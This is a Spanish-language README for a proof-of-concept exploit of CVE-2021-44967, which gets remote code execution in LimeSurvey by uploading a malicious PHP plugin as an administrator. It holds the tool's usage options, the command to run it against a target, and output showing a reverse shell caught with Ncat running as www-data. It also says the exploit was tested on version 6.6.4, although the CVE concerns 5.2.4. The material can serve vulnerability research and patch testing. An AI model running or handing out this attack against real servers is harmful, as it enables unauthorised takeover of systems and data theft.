
Exploit de prueba de concepto para CVE-2021-44967 que permite la ejecución remota de código en LimeSurvey 5.2.4 mediante la carga de un plugin malicioso, con capacidad de shell inversa.
Esta Prueba de Concepto (PoC) puede usarse para explotar CVE-2021-44967 y cargar y ejecutar un complemento PHP malicioso de LimeSurvey como administrador para obtener una shell inversa.
Existe una vulnerabilidad de Ejecución Remota de Código (RCE) en LimeSurvey 5.2.4 a través de la función de carga e instalación de complementos, que podría permitir a un usuario remoto malintencionado cargar un archivo de código PHP arbitrario.
Gravedad: 8.3 ALTA Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
usage: limesurvey_rce.py [-h] -t URL -u USERNAME -p PASSWORD [-f FILE] [--listen-ip LISTEN_IP] [--listen-port LISTEN_PORT] [--threads THREADS] [--sleep-time SLEEP_TIME] [--row ROW]
[--length LENGTH] [-a USERAGENT] [-x PROXY] [-v]
POC for CVE-2021-44967 (LimeSurvey RCE)
options:
-h, --help show this help message and exit
-t, --url URL LimeSurvey Target URL
-u, --username USERNAME
LimeSurvey username
-p, --password PASSWORD
LimeSurvey password
-f, --file FILE Custom PHP payload file
--listen-ip LISTEN_IP
Listening IP / Interface
--listen-port LISTEN_PORT
Listening Port
-a, --useragent USERAGENT
User agent to use when sending requests
-x, --proxy PROXY HTTP(s) proxy to use when sending requests (i.e. -p http://127.0.0.1:8080)
-v, --verbose Verbosity enabled - additional output flag
python3 limesurvey_rce.py -t https://TARGET/ -u 'USERNAME' -p 'PASSWORD'
[*] Authenticating ...
[+] Login successful!
[*] Uploading plugin ...
[*] Activating plugin ...
[*] Starting listener and sending reverse shelll ...
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from X.X.X.X:51004.
www-data@target:/$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Probado en LimeSurvey Community Edition Versión 6.6.4.